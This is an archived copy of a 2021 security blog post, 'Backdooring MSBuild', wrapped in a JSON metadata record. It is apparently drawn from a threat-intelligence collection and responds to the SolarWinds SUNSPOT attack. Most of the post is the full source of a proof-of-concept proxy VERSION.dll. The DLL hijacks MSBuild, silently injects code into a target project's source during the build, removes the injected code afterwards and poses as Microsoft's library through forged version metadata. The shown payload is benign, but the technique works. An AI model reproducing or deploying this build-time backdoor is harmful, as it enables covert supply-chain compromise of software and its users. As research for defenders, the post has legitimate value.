{
	"id": "c70b3323-c7f9-4d3b-83a2-4934891eaf0f",
	"created_at": "2026-04-06T00:09:38.659508Z",
	"updated_at": "2026-04-10T13:12:41.564733Z",
	"deleted_at": null,
	"sha1_hash": "76b941484ec149fa778b3c57dbb02c4e53c387d9",
	"title": "Backdooring MSBuild",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 220946,
	"plain_text": "Backdooring MSBuild\r\nPublished: 2021-01-17 · Archived: 2026-04-05 15:12:21 UTC\r\nIn 2020, different United States federal government branches were affected by a massive data breach. One part of\r\nthese efforts was an attack on SolarWinds and their platform, including the build-infrastructure of their flagship\r\nproduct, SolarWinds Orion. On January 11th, 2021, the CrowdStrike Intelligence Team published an analysis of a\r\nmalicious tool deployed into SolarWinds’ build environment to inject the SUNBURST backdoor into the\r\nSolarWinds Orion platform at build-time.\r\nThe CrowdStrike blog post was referred to me by a colleague. Initially, I thought it was pretty sloppy of the\r\nSUNSPOT developers to search for MSBuild.exe processes every second, then read the virtual memory of these\r\nremote processes to determine if the right solution is being build right now. In addition to all this noise, the\r\nSUNBURST attackers created a Scheduled Task to start the implant on every boot.\r\nIf one imagines that you are a top of the line attack boutique and compromised different hard targets, including\r\nthe build-infrasturcture, why do you resort to such a crude way to execute that beautiful implanting attack?\r\nSo how could one do better?\r\nMSBuild Revisited\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 1 of 13\n\nSo, MSBuild, the Microsoft engine for building applications, uses (most of the time) XML files to steer the\r\ntargeted solution’s build process.\r\nOne of the first things you’ll notice when inspecting the MSBuild.exe binary is that it is itself a .NET Assembly.\r\nSo what is the best way to backdoor (almost) any .NET Assembly?\r\n… right, using the version.dll trick.\r\nAfter running a quick build of an arbitrary solution (e.g. via\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe SomeProject.sln /t:Build\r\n/p:Configuration=Release;Platform=Win64 ) and recording a trace with ProcMon, multiple DLLs are searched in\r\nthe directory of MSBuild.exe :\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\mscoree.dll\",\"p\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\ole32.dll\",\"proc\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\api-ms-win-core-\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\VERSION.dll\",\"pr\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\api-ms-win-core-\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\sxs.dll\",\"proces\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\WindowsCodecs.dl\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\VERSION.dll\",\"pr\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\mscoree.dll\",\"pr\r\nGiven these results, we can target MSBuild.exe or the C# compiler ( Csc.exe ) directly, depending on our\r\npreferences and objectives. As CrowdStrike mentioned, the implant checked for the right solution being built, so\r\nwe also will target MSBuild.exe in our tests.\r\nVERSION.dll Structure\r\nFor our purposes, it is enough to know that VERSION.dll exports 17 names, which we need to implement (or\r\nforward) to ensure the target’s functionality is not impaired.\r\n__export_name(GetFileVersionInfoA)\r\n__export_name(GetFileVersionInfoByHandle)\r\n__export_name(GetFileVersionInfoExA)\r\n__export_name(GetFileVersionInfoExW)\r\n__export_name(GetFileVersionInfoSizeA)\r\n__export_name(GetFileVersionInfoSizeExA)\r\n__export_name(GetFileVersionInfoSizeExW)\r\n__export_name(GetFileVersionInfoSizeW)\r\n__export_name(GetFileVersionInfoW)\r\n__export_name(VerFindFileA)\r\n__export_name(VerFindFileW)\r\n__export_name(VerInstallFileA)\r\n__export_name(VerInstallFileW)\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 2 of 13\n\n__export_name(VerLanguageNameA)\r\n__export_name(VerLanguageNameW)\r\n__export_name(VerQueryValueA)\r\n__export_name(VerQueryValueW)\r\nProof of Concept (PoC)\r\nThe following section describes a crude PoC that implements the backdoor functionality in a DLL without the\r\nneed for reading remote process memory or triggering a process search every second.\r\nThe PoC will be written in PureBasic, as no sane attacker will implement his implant in it and copy-pasting of this\r\nsource is therefore not a concern ;-)\r\nObjectives\r\nThe implant should have the following characteristics:\r\nno additional running processes\r\nno remote process actions (reading/ writing remote process memory, etc.)\r\nonly trigger on the right solution being build\r\ninsertion of the backdoor during the build process\r\nremoval of the backdoored source file after the build process\r\nImplementation\r\nAs we saw earlier, the VERSION.dll file is loaded very early by the .NET runtime. By implementing mock-functions, it is possible to verify that the DLL is not only loaded, but the function GetFileVersionInfoSizeW is\r\ncalled right before the build process is executed, as shown in the following figure.\r\nGiven that, it is possible not to rely on any half-baked solution in the DllMain function and get around any\r\nproblems with the Loader Lock by simply hijacking the call GetFileVersionInfoSizeW , executing our backdoor\r\ninsertion code, then calling the real GetFileVersionInfoSizeW function and returning its result.\r\nIn the PoC presented below, the backdoor is inserted in the call to GetFileVersionInfoSizeW . The source is\r\nsaved in memory, and as soon as DllMain is called with DLL_PROCESS_DETACH , the backdoor-code is removed by\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 3 of 13\n\nrestoring the previous source code.\r\nConclusion\r\nTargeting MSBuild directly by copying our VERSION.dll to the MSBuild directory, ensures better operational\r\nsecurity as no additional processes need to be created, the memory search can be omitted and every build is\r\ncaptured, as our code is directly executed by MSBuild.\r\nSource\r\nSource and a compiled binary is available in the blog’s Github repo.\r\n; ***************************************************************************\r\n; * *\r\n; * Author: marpie (marpie@a12d404.net) *\r\n; * License: BSD 2-clause *\r\n; * Copyright: (c) 2021, a12d404.net *\r\n; * Status: Prototype *\r\n; * Created: 20200116 *\r\n; * Last Update: 20200117 *\r\n; * *\r\n; ***************************************************************************\r\nEnableExplicit\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 4 of 13\n\n; ---------------------------------------------------------------------------\r\n;- Consts\r\n#TARGET_SOLUTION = \"ConsoleApp1.sln\"\r\n#BACKDOOR_CODE = \"public Class1() { Console.WriteLine(\" + Chr(34) + \"Hello from the Static initializer!\" + Chr(3\r\n#BACKDOOR_INSERT_AFTER = \"class Class1 {\"\r\n#BACKDOOR_ALIVE = $c45c9bda8db1\r\n#MIN_SIZE = 100 ; 100 bytes\r\n; ---------------------------------------------------------------------------\r\n;- Variables\r\nGlobal mux.i = #Null ; set in DLL_PROCESS_ATTACH\r\nGlobal hVersion.i = #Null ; orig version.dll handle\r\nGlobal active.i = 0 ; checked in CleanupBackdoor\r\nGlobal origContent.s = \"\" ; ptr to memory of the original source\r\nGlobal origContentSize.i = 0 ; size of the original source\r\n; ---------------------------------------------------------------------------\r\n;- Backdoor Handling\r\nProcedure.s GetTargetFilePath()\r\n Define i.i\r\n Define path.s\r\n For i = 0 To CountProgramParameters()\r\n path = ProgramParameter(i)\r\n If CountString(path, #TARGET_SOLUTION) \u003e 0\r\n ProcedureReturn GetPathPart(path) + \"Program.cs\"\r\n EndIf\r\n Next\r\n ProcedureReturn \"\"\r\nEndProcedure\r\nProcedure.b ReadOrigContent(hFile.i)\r\n Define res.b = #False\r\n FileSeek(hFile, 0, #PB_Absolute)\r\n Define size.i = Lof(hFile)\r\n Define *mem = AllocateMemory(size)\r\n If ReadData(hFile, *mem, size) \u003c\u003e size\r\n Goto ReadAllCleanup\r\n EndIf\r\n origContent = PeekS(*mem, size, #PB_UTF8)\r\n origContentSize = Len(origContent)\r\n res = #True\r\nReadAllCleanup:\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 5 of 13\n\nIf *mem\r\n FreeMemory(*mem)\r\n EndIf\r\n ProcedureReturn res\r\nEndProcedure\r\n; InsertBackdoor needs to be called from a function holing mux!\r\nProcedure.b InsertBackdoor(path.s)\r\n Define res.b = #False\r\n \r\n Define hFile.i = OpenFile(#PB_Any, path, #PB_File_SharedRead | #PB_UTF8)\r\n If Not hFile\r\n ProcedureReturn res\r\n EndIf\r\n \r\n ; read file content\r\n If Not ReadOrigContent(hFile)\r\n Goto InsertBackdoorError\r\n EndIf\r\n \r\n ; check if the right code is present\r\n Define pos.i = FindString(origContent, #BACKDOOR_INSERT_AFTER)-1\r\n If pos \u003c 0\r\n Goto InsertBackdoorError\r\n EndIf\r\n \r\n ; revert file to 0\r\n FileSeek(hFile, 0, #PB_Absolute)\r\n TruncateFile(hFile)\r\n \r\n ; write content till start of backdoor\r\n Define writeSize.i = pos+Len(#BACKDOOR_INSERT_AFTER)\r\n Define sizeLeft = writeSize\r\n If WriteString(hFile, Left(origContent, writeSize), #PB_UTF8) = 0\r\n ; we should add a restore of the original file here\r\n ; ... depending on the write error ...\r\n Goto InsertBackdoorError\r\n EndIf\r\n \r\n ; write backdoor\r\n writeSize = Len(#BACKDOOR_CODE)\r\n \r\n If WriteString(hFile, #BACKDOOR_CODE, #PB_UTF8) = 0\r\n ; we should add a restore of the original file here\r\n ; ... depending on the write error ...\r\n Goto InsertBackdoorError\r\n EndIf\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 6 of 13\n\n; write rest of file\r\n writeSize = origContentSize-sizeLeft\r\n If WriteString(hFile, Right(origContent, writeSize), #PB_UTF8) = 0\r\n ; we should add a restore of the original file here\r\n ; ... depending on the write error ...\r\n Goto InsertBackdoorError\r\n EndIf\r\n \r\n res = #True\r\nInsertBackdoorCleanup:\r\n CloseFile(hFile)\r\n ProcedureReturn res\r\nInsertBackdoorError:\r\n If Len(origContent) \u003e 0\r\n origContent = \"\"\r\n origContentSize= 0\r\n EndIf\r\n Goto InsertBackdoorCleanup\r\nEndProcedure\r\nProcedure ActivateBackdoor()\r\n LockMutex(mux)\r\n ; check if the backdoor is already alive\r\n If #BACKDOOR_ALIVE = active\r\n Goto ActivateBackdoorCleanup\r\n EndIf\r\n ; check if we have the right solution\r\n Define targetFilepath.s = GetTargetFilePath()\r\n If Len(targetFilepath) \u003c 1\r\n Goto ActivateBackdoorCleanup\r\n EndIf\r\n \r\n MessageRequester(\"ActivateBackdoor\", \"Hello World from Solution: \" + #CRLF$ + ProgramParameter(0))\r\n \r\n ; init backdoor\r\n If InsertBackdoor(targetFilepath)\r\n active = #BACKDOOR_ALIVE\r\n MessageRequester(\"ActivateBackdoor\", \"... backdoor insered ...\")\r\n Else\r\n MessageRequester(\"ActivateBackdoor\", \"... backdooring failed ...\")\r\n EndIf\r\n \r\nActivateBackdoorCleanup:\r\n UnlockMutex(mux)\r\n ProcedureReturn\r\nEndProcedure\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 7 of 13\n\nProcedure CleanupBackdoor()\r\n LockMutex(mux)\r\n If #BACKDOOR_ALIVE = active\r\n active = #Null\r\n ; Do cleanup here\r\n If origContentSize \u003c\u003e 0\r\n Define hFile.i = CreateFile(#PB_Any, GetTargetFilePath(), #PB_UTF8)\r\n If hFile\r\n WriteString(hFile, origContent, #PB_UTF8)\r\n CloseFile(hFile)\r\n EndIf\r\n origContent = \"\"\r\n origContentSize = 0\r\n EndIf\r\n EndIf\r\nCleanupBackdoorCleanup:\r\n UnlockMutex(mux)\r\n ProcedureReturn\r\nEndProcedure\r\n; ---------------------------------------------------------------------------\r\n;- DllMain Stuff\r\nProcedureDLL AttachProcess(Instance)\r\n mux = CreateMutex()\r\nEndProcedure\r\nProcedureDLL DetachProcess(Instance)\r\n CleanupBackdoor()\r\nEndProcedure\r\n; ---------------------------------------------------------------------------\r\n;- orig VERSION.dll Stuff\r\nProcedure.i LoadVersionDll()\r\n Define res.i = #Null\r\n LockMutex(mux)\r\n If #Null = hVersion\r\n ; load version.dll\r\n Define dllPath.s = GetEnvironmentVariable(\"windir\") + \"\\system32\\version.dll\"\r\n hVersion = OpenLibrary(#PB_Any, dllPath)\r\n EndIf\r\n res = hVersion\r\nCleanupLoadVersionDll:\r\n UnlockMutex(mux)\r\n ProcedureReturn res\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 8 of 13\n\nEndProcedure\r\n;BOOL GetFileVersionInfoA(\r\n; LPCSTR lptstrFilename,\r\n; DWORD dwHandle,\r\n; DWORD dwLen,\r\n; LPVOID lpData\r\n;);\r\nProcedureDLL.i GetFileVersionInfoA(a1.i, a2.l, a3.l, a4.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoA\", a1, a2, a3, a4)\r\nEndProcedure\r\n;BOOL GetFileVersionInfoExA(\r\n; DWORD dwFlags,\r\n; LPCSTR lpwstrFilename,\r\n; DWORD dwHandle,\r\n; DWORD dwLen,\r\n; LPVOID lpData\r\n;);\r\nProcedureDLL.i GetFileVersionInfoExA(a1.l, a2.i, a3.l, a4.l, a5.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoExA\", a1, a2, a3, a4, a5)\r\nEndProcedure\r\n;BOOL GetFileVersionInfoExW(\r\n; DWORD dwFlags,\r\n; LPCWSTR lpwstrFilename,\r\n; DWORD dwHandle,\r\n; DWORD dwLen,\r\n; LPVOID lpData\r\n;);\r\nProcedureDLL.i GetFileVersionInfoSizeExW(a1.l, a2.i, a3.l, a4.l, a5.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoSizeExW\", a1, a2, a3, a4, a5)\r\nEndProcedure\r\n;DWORD GetFileVersionInfoSizeA(\r\n; LPCSTR lptstrFilename,\r\n; LPDWORD lpdwHandle\r\n;);\r\nProcedureDLL.i GetFileVersionInfoSizeA(a1.i, a2.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoSizeA\", a1, a2)\r\nEndProcedure\r\n;DWORD GetFileVersionInfoSizeExA(\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 9 of 13\n\n; DWORD dwFlags,\r\n; LPCSTR lpwstrFilename,\r\n; LPDWORD lpdwHandle\r\n;);\r\nProcedureDLL.i GetFileVersionInfoSizeExA(a1.l, a2.i, a3.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoSizeExA\", a1, a2, a3)\r\nEndProcedure\r\n;DWORD GetFileVersionInfoSizeExW(\r\n; DWORD dwFlags,\r\n; LPCWSTR lpwstrFilename,\r\n; LPDWORD lpdwHandle\r\n;);\r\nProcedureDLL.i GetFileVersionInfoExW(a1.l, a2.i, a3.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoExW\", a1, a2, a3)\r\nEndProcedure\r\n;DWORD GetFileVersionInfoSizeW(\r\n; LPCWSTR lptstrFilename,\r\n; LPDWORD lpdwHandle\r\n;);\r\nProcedureDLL.i GetFileVersionInfoSizeW(a1.i, a2.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoExW\", a1, a2)\r\nEndProcedure\r\n;BOOL GetFileVersionInfoW(\r\n; LPCWSTR lptstrFilename,\r\n; DWORD dwHandle,\r\n; DWORD dwLen,\r\n; LPVOID lpData\r\n;);\r\nProcedureDLL.i GetFileVersionInfoW(a1.i, a2.l, a3.l, a4.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoW\", a1, a2, a3, a4)\r\nEndProcedure\r\n; int hMem, LPCWSTR lpFileName, int v2, int v3\r\nProcedureDLL.i GetFileVersionInfoByHandle(a1.i, a2.i, a3.i, a4.l)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoByHandle\", a1, a2, a3, a4)\r\nEndProcedure\r\n;DWORD VerFindFileA(\r\n; DWORD uFlags,\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 10 of 13\n\n; LPCSTR szFileName,\r\n; LPCSTR szWinDir,\r\n; LPCSTR szAppDir,\r\n; LPSTR szCurDir,\r\n; PUINT puCurDirLen,\r\n; LPSTR szDestDir,\r\n; PUINT puDestDirLen\r\n;);\r\nProcedureDLL.i VerFindFileA(a1.l, a2.i, a3.i, a4.i, a5.i, a6.i, a7.i, a8.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"VerFindFileA\", a1, a2, a3, a4, a5, a6, a7, a8)\r\nEndProcedure\r\n;DWORD VerFindFileW(\r\n; DWORD uFlags,\r\n; LPCWSTR szFileName,\r\n; LPCWSTR szWinDir,\r\n; LPCWSTR szAppDir,\r\n; LPWSTR szCurDir,\r\n; PUINT puCurDirLen,\r\n; LPWSTR szDestDir,\r\n; PUINT puDestDirLen\r\n;);\r\nProcedureDLL.i VerFindFileW(a1.l, a2.i, a3.i, a4.i, a5.i, a6.i, a7.i, a8.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"VerFindFileW\", a1, a2, a3, a4, a5, a6, a7, a8)\r\nEndProcedure\r\n;DWORD VerInstallFileA(\r\n; DWORD uFlags,\r\n; LPCSTR szSrcFileName,\r\n; LPCSTR szDestFileName,\r\n; LPCSTR szSrcDir,\r\n; LPCSTR szDestDir,\r\n; LPCSTR szCurDir,\r\n; LPSTR szTmpFile,\r\n; PUINT puTmpFileLen\r\n;);\r\nProcedureDLL.i VerInstallFileA(a1.l, a2.i, a3.i, a4.i, a5.i, a6.i, a7.i, a8.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"VerInstallFileA\", a1, a2, a3, a4, a5, a6, a7, a8)\r\nEndProcedure\r\n;DWORD VerInstallFileW(\r\n; DWORD uFlags,\r\n; LPCWSTR szSrcFileName,\r\n; LPCWSTR szDestFileName,\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 11 of 13\n\n; LPCWSTR szSrcDir,\r\n; LPCWSTR szDestDir,\r\n; LPCWSTR szCurDir,\r\n; LPWSTR szTmpFile,\r\n; PUINT puTmpFileLen\r\n;);\r\nProcedureDLL.i VerInstallFileW(a1.l, a2.i, a3.i, a4.i, a5.i, a6.i, a7.i, a8.i)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"VerInstallFileW\", a1, a2, a3, a4, a5, a6, a7, a8)\r\nEndProcedure\r\n;DWORD VerLanguageNameA(\r\n; DWORD wLang,\r\n; LPSTR szLang,\r\n; DWORD cchLang\r\n;);\r\nProcedureDLL.i VerLanguageNameA(a1.l, a2.i, a3.l)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"VerLanguageNameA\", a1, a2, a3)\r\nEndProcedure\r\n;DWORD VerLanguageNameW(\r\n; DWORD wLang,\r\n; LPWSTR szLang,\r\n; DWORD cchLang\r\n;);\r\nProcedureDLL.i VerLanguageNameW(a1.l, a2.i, a3.l)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"VerLanguageNameW\", a1, a2, a3)\r\nEndProcedure\r\n;BOOL VerQueryValueA(\r\n; LPCVOID pBlock,\r\n; LPCSTR lpSubBlock,\r\n; LPVOID *lplpBuffer,\r\n; PUINT puLen\r\n;);\r\nProcedureDLL.i VerQueryValueA(a1.i, a2.i, a3.i, a4.l)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"VerQueryValueA\", a1, a2, a3, a4)\r\nEndProcedure\r\n;BOOL VerQueryValueW(\r\n; LPCVOID pBlock,\r\n; LPCWSTR lpSubBlock,\r\n; LPVOID *lplpBuffer,\r\n; PUINT puLen\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 12 of 13\n\n;);\r\nProcedureDLL.i VerQueryValueW(a1.i, a2.i, a3.i, a4.l)\r\n ActivateBackdoor()\r\n ProcedureReturn CallCFunction(LoadVersionDll(), \"VerQueryValueW\", a1, a2, a3, a4)\r\nEndProcedure\r\n; ---------------------------------------------------------------------------\r\n; IDE Options = PureBasic 5.73 LTS (Windows - x64)\r\n; ExecutableFormat = Shared dll\r\n; CursorPosition = 85\r\n; FirstLine = 60\r\n; Folding = -----\r\n; Executable = version.dll\r\n; CompileSourceDirectory\r\n; EnablePurifier\r\n; IncludeVersionInfo\r\n; VersionField2 = Microsoft Corporation\r\n; VersionField3 = Microsoft® Windows® Operating System\r\n; VersionField5 = 10.0.20190.1000 (WinBuild.160101.0800)\r\n; VersionField6 = Version Checking and File Installation Libraries\r\n; VersionField7 = version\r\n; VersionField8 = VERSION.DLL\r\n; VersionField9 = © Microsoft Corporation. All rights reserved.\r\n; VersionField15 = VOS_NT\r\n; VersionField16 = VFT_DLL\r\nSource: https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html"
	],
	"report_names": [
		"msbuild-backdoor.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434178,
	"ts_updated_at": 1775826761,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/76b941484ec149fa778b3c57dbb02c4e53c387d9.pdf",
		"text": "https://archive.orkl.eu/76b941484ec149fa778b3c57dbb02c4e53c387d9.txt",
		"img": "https://archive.orkl.eu/76b941484ec149fa778b3c57dbb02c4e53c387d9.jpg"
	}
}